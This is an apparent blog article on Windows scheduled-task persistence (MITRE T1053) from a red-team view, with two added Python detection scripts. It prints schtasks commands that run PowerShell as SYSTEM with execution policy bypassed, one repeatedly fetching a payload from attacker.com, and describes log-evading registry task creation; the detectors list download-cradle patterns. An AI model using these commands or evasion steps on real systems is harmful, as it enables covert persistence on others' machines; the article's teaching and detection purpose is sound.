Subhash Paudel

Windows Persistence Through Scheduled Tasks: A Red Team Perspective

Updated: Oct 7

Maintaining access to a compromised system is a critical objective for threat actors and red teams. One of the most effective methods for achieving this persistence on Windows systems is through the use of Scheduled Tasks. This article will delve into how this technique is utilised by attackers, the potential implications for compromised systems, and its alignment with the MITRE ATT&CK framework, specifically focusing on technique T1053.



What Are Windows Scheduled Tasks?


Windows Scheduled Tasks is a powerful built-in feature that allows users and administrators to automate the execution of programs or scripts at specified times or under certain conditions. While this functionality is essential for legitimate administrative tasks such as system maintenance, software updates, and backups, it has been heavily abused by attackers to maintain persistence on compromised systems.


Persistence refers to the ability of an attacker to maintain their access to a system, even after restarts or logoffs. Scheduled tasks are a particularly effective means of persistence because they can be configured to execute with elevated privileges, at critical moments such as system startup or user logon.


How Scheduled Tasks Work


The schtasks.exe utility is the primary tool used to create and manage scheduled tasks from the command line. This utility offers a variety of scheduling options, giving attackers the flexibility to run malicious code at startup, on logon, or at regular intervals, depending on their needs.


Here's an example of a command used to create a scheduled task that runs a PowerShell script every time a user logs in:

schtasks /create /tn "MaliciousTask" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\malicious-script.ps1" /sc onlogon /ru SYSTEM

  • /tn "MaliciousTask" specifies the name of the task.

  • /tr "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\malicious-script.ps1" defines the command that will be executed, in this case a PowerShell script launched with the default execution policy bypassed.

  • /sc onlogon schedules the task to run every time a user logs in, ensuring the persistence mechanism is triggered as soon as a user session starts.

  • /ru SYSTEM runs the task with SYSTEM privileges, giving it elevated access to the system. This ensures the task operates with the highest level of access, making it harder to remove and more dangerous in its capabilities.


In practice, this means an attacker could set up a task to run every time a user logs on, or even on a system reboot, without needing any further interaction. This type of persistence ensures that even if other parts of the attack are discovered and cleaned up, the task remains, silently executing malicious code.


The Red Team Perspective


From a red team perspective, leveraging scheduled tasks for persistence is a tried-and-true tactic. It is a method that blends into the typical behaviour of Windows environments, making it less likely to raise alarms. System administrators often use scheduled tasks for routine operations, so adding a malicious task can go unnoticed.


In a real-world red team engagement, an operator might create a persistent task designed to download and execute a malicious payload. A practical example could involve setting up a task to run every minute, ensuring that a payload is repeatedly downloaded and executed:

schtasks /create /tn "DownloadPayload" /tr "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://attacker.com/payload.exe -OutFile C:\temp\payload.exe" /sc minute /mo 1 /ru SYSTEM

[Screenshot: persistent scheduled task run in PowerShell]

This task ensures that even if the payload is removed or blocked by antivirus software, it will be downloaded again every minute, guaranteeing a steady stream of attacks. Once the task successfully runs, the attacker can establish a remote session to a Command-and-Control (C2) server, allowing them to maintain control over the compromised system.


[Screenshot: scheduled task reaching out to a Metasploit listener]

Evasion Techniques


While creating a scheduled task is relatively simple, more advanced attackers or red teams may employ evasion techniques to ensure that their activities go unnoticed. One such technique involves directly modifying the Windows Registry to create or alter scheduled tasks. By doing this, attackers can bypass the standard event logs associated with task creation, which would otherwise alert security teams.


For example, attackers might write their task directly into the TaskCache registry keys under:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Tasks

This allows them to establish persistence without generating the usual Windows Event Logs, making it much harder for defenders to detect the task’s existence.


Additionally, attackers may schedule tasks to run at irregular or random intervals to further evade detection. By avoiding predictable schedules, such as running every minute or hour, they reduce the likelihood that automated detection systems will flag the task as suspicious.


Defending Against Scheduled Task Abuse


To defend against the misuse of scheduled tasks, defenders should regularly audit the Task Scheduler and monitor event logs for signs of abnormal task creation. Task Scheduler logs are stored in the Event Viewer under Applications and Services Logs > Microsoft > Windows > TaskScheduler. By keeping an eye on these logs, defenders can catch unusual task creation events or suspicious commands tied to PowerShell or other administrative tools.
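The audit described above can be automated against the task definitions themselves. Task Scheduler stores every registered task as an XML document under %SystemRoot%\System32\Tasks, and Security event 4698 (a scheduled task was created) carries the same XML in its TaskContent field. The following Python script is an added example, not code from the original article; it parses that XML and reports the indicators the schtasks walkthrough earlier in this article introduced: a SYSTEM principal, a logon or boot trigger, a repetition interval of a few minutes, a PowerShell execution-policy bypass, and a payload under a user-writable path. The two task definitions and the 300-second repetition threshold are constructed for the example.

```python
"""Audit Task Scheduler task definitions for persistence indicators.

Task Scheduler stores each registered task as XML under
%SystemRoot%\\System32\\Tasks; the same XML appears in the TaskContent
field of Security event 4698. This added example parses that XML and
reports the indicators discussed in the article. Sample tasks and the
repetition threshold are constructed for the example.
"""
import re
import xml.etree.ElementTree as ET

# Namespace used by every Task Scheduler 2.0 task definition.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

SYSTEM_IDS = {"s-1-5-18", "system", "nt authority\\system", "localsystem"}
REPEAT_THRESHOLD_SECONDS = 300          # constructed threshold: repeats tighter than 5 min
SUSPICIOUS_SWITCHES = [
    r"-(?:executionpolicy|ep)\s+bypass",
    r"-(?:encodedcommand|enc|e)\s+[a-z0-9+/=]{16,}",
    r"-(?:windowstyle|w)\s+hidden",
]
WRITABLE_PATHS = r"\\(?:temp|tmp|users\\public|programdata|appdata)\\"

# Constructed sample: the definition schtasks registers for the article's
# "MaliciousTask" command (XML declaration omitted so the text parses directly;
# the files on disk are UTF-16 and carry a declaration).
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\MaliciousTask</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File C:\\path\\to\\malicious-script.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign comparison: a nightly backup under a service account.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Backup\\NightlyBackup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>EXAMPLE\\svc_backup</UserId>
    <RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Backup\\backup.exe</Command>
    <Arguments>--nightly</Arguments></Exec></Actions>
</Task>"""


def iso_duration_seconds(value):
    """Convert an ISO 8601 duration such as PT1M or P1DT2H to seconds (None if malformed)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def audit_task(xml_text):
    """Return (task URI, list of findings) for one task definition (str or bytes)."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="<unnamed>", namespaces=NS)
    findings = []

    for principal in root.findall("t:Principals/t:Principal", NS):
        user = principal.findtext("t:UserId", default="", namespaces=NS).strip()
        if user.lower() in SYSTEM_IDS:
            findings.append(f"runs as SYSTEM ({user})")
        if principal.findtext("t:RunLevel", default="", namespaces=NS) == "HighestAvailable":
            findings.append("RunLevel HighestAvailable")

    triggers = root.find("t:Triggers", NS)
    for trigger in (list(triggers) if triggers is not None else []):
        kind = trigger.tag.rsplit("}", 1)[-1]          # strip the namespace
        if kind in ("LogonTrigger", "BootTrigger"):
            findings.append(f"{kind}: fires at logon/boot")
        interval = trigger.findtext("t:Repetition/t:Interval", default="", namespaces=NS)
        seconds = iso_duration_seconds(interval) if interval else None
        if seconds is not None and seconds <= REPEAT_THRESHOLD_SECONDS:
            findings.append(f"repeats every {seconds}s ({interval})")

    for action in root.findall("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS)
        arguments = action.findtext("t:Arguments", default="", namespaces=NS)
        line = f"{command} {arguments}".strip()
        for pattern in SUSPICIOUS_SWITCHES:
            hit = re.search(pattern, line, re.IGNORECASE)
            if hit:
                findings.append(f"suspicious switch: {hit.group(0)}")
        if re.search(WRITABLE_PATHS, line, re.IGNORECASE):
            findings.append("launches from a user-writable path")
    return uri, findings


if __name__ == "__main__":
    for xml_text in (SAMPLE_TASK_XML, BENIGN_TASK_XML):
        uri, findings = audit_task(xml_text)
        print(uri, "->", findings or "no findings")
```

To run this against a live system, pass the raw bytes of each file under %SystemRoot%\System32\Tasks (or the TaskContent string from a 4698 event) to audit_task; the XML parser handles the UTF-16 encoding those files use. Because the same definition is what the Task Scheduler service reads, a task that was written straight into the TaskCache registry keys still surfaces here once its XML is recovered, which is the point of auditing definitions rather than relying only on creation events.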


Security teams should also focus on detecting execution policy bypasses in PowerShell scripts, as these are commonly used by attackers to execute malicious code. Logging tools such as Windows PowerShell Logging and Sysmon can be helpful in detecting these activities. Sysmon can log the creation of new processes, which includes scheduled tasks triggering malicious scripts.
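As an added example (not from the original article), here is how the Sysmon process-creation angle can be turned into detection logic over sample Event ID 1 records. On Windows 10 and later the Task Scheduler service runs in its own service host, "svchost.exe -k netsvcs -p -s Schedule", so a task's action shows up in process-creation telemetry as a child of that svchost instance. The script parses the rendered message text of three constructed events, one of them modelled on the payload-download task shown earlier, and flags Schedule-spawned processes whose command line carries execution-policy, encoded-command, download-cradle or user-writable-path cues. Field names are Sysmon's; the events, hostnames and paths are constructed.

```python
"""Flag scheduled-task-launched processes in Sysmon Event ID 1 records.

On Windows 10 and later the Task Scheduler service runs inside
"svchost.exe -k netsvcs -p -s Schedule", so a task action appears in
Sysmon process-creation telemetry as a child of that svchost. This added
example parses rendered Event ID 1 message text (constructed samples) and
flags Schedule-spawned processes whose command line carries the cues the
article describes.
"""
import re

# Three constructed Sysmon Event ID 1 messages (field subset), separated by ---.
SAMPLE_EVENTS = """\
UtcTime: 2024-10-07 09:00:01.117
ProcessId: 4120
Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
CommandLine: powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://attacker.example/payload.exe -OutFile C:\\temp\\payload.exe
User: NT AUTHORITY\\SYSTEM
ParentImage: C:\\Windows\\System32\\svchost.exe
ParentCommandLine: C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule
---
UtcTime: 2024-10-07 09:00:05.402
ProcessId: 4188
Image: C:\\Program Files\\Backup\\backup.exe
CommandLine: "C:\\Program Files\\Backup\\backup.exe" --nightly
User: EXAMPLE\\svc_backup
ParentImage: C:\\Windows\\System32\\svchost.exe
ParentCommandLine: C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule
---
UtcTime: 2024-10-07 09:01:12.090
ProcessId: 4302
Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
CommandLine: powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\deploy.ps1
User: EXAMPLE\\admin
ParentImage: C:\\Windows\\explorer.exe
ParentCommandLine: C:\\Windows\\Explorer.EXE
"""

# Command-line cues, in the order they are reported.
CUES = {
    "execution policy bypass": r"-(?:executionpolicy|ep)\s+bypass",
    "encoded command": r"-(?:encodedcommand|enc|e)\s+[a-z0-9+/=]{16,}",
    "hidden window": r"-(?:windowstyle|w)\s+hidden",
    "download cradle": r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|https?://",
    "user-writable drop path": r"\\(?:temp|tmp|users\\public|programdata)\\",
}


def parse_events(text):
    """Split rendered Sysmon messages on '---' and return one dict of fields per event."""
    events = []
    for block in text.split("---"):
        fields = {}
        for line in block.strip().splitlines():
            key, sep, value = line.partition(":")   # split on the first colon only
            if sep:
                fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def spawned_by_task_scheduler(event):
    """True when the parent is the svchost instance hosting the Schedule service."""
    parent_is_svchost = event.get("ParentImage", "").lower().endswith("\\svchost.exe")
    return parent_is_svchost and re.search(
        r"-s\s+schedule\b", event.get("ParentCommandLine", ""), re.IGNORECASE) is not None


def detect(events):
    """Return (ProcessId, image file name, [matched cues]) for each suspicious task child."""
    hits = []
    for event in events:
        if not spawned_by_task_scheduler(event):
            continue
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        cmdline = event.get("CommandLine", "")
        matched = [name for name, pattern in CUES.items()
                   if re.search(pattern, cmdline, re.IGNORECASE)]
        if matched:
            hits.append((event.get("ProcessId"), image, matched))
    return hits


if __name__ == "__main__":
    for pid, image, cues in detect(parse_events(SAMPLE_EVENTS)):
        print(f"PID {pid} {image}: {', '.join(cues)}")
```

The third event is deliberately left alone: the same execution-policy bypass launched from Explorer is a different detection problem, and scoping on the Schedule service host is what keeps this rule tied to task persistence. On systems older than Windows 10 version 1703 the Schedule service shares a netsvcs svchost without the "-s Schedule" switch, so the parent check above does not apply there; the Task Scheduler operational log (Microsoft-Windows-TaskScheduler/Operational, event 200 "action started") is the fallback for tying a process back to its task.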


MITRE ATT&CK Framework Alignment


This tactic of using scheduled tasks for persistence aligns with the MITRE ATT&CK framework under T1053: Scheduled Task/Job. The technique is categorised under Persistence, as it allows an attacker to maintain access to a system. It also falls under Privilege Escalation, as scheduled tasks can be configured to run with SYSTEM or other elevated privileges.


The MITRE ATT&CK framework is a widely adopted model for understanding the tactics, techniques, and procedures (TTPs) used by attackers. By aligning red team tactics with the MITRE ATT&CK framework, both attackers and defenders can gain a deeper understanding of how to implement or defend against certain techniques.


Conclusion


Scheduled tasks are a versatile and widely used persistence mechanism in Windows environments. For red teams and attackers, they provide a reliable method to maintain access and execute malicious code under the radar. For defenders, understanding the ways in which scheduled tasks can be abused is critical to developing effective detection and prevention strategies.


Regular auditing, robust logging, and a comprehensive understanding of the MITRE ATT&CK framework are key to ensuring that these tactics are detected and mitigated before they cause significant damage.


By optimising security practices and focusing on proactive detection, organisations can better protect against this common persistence mechanism in their Windows environments.
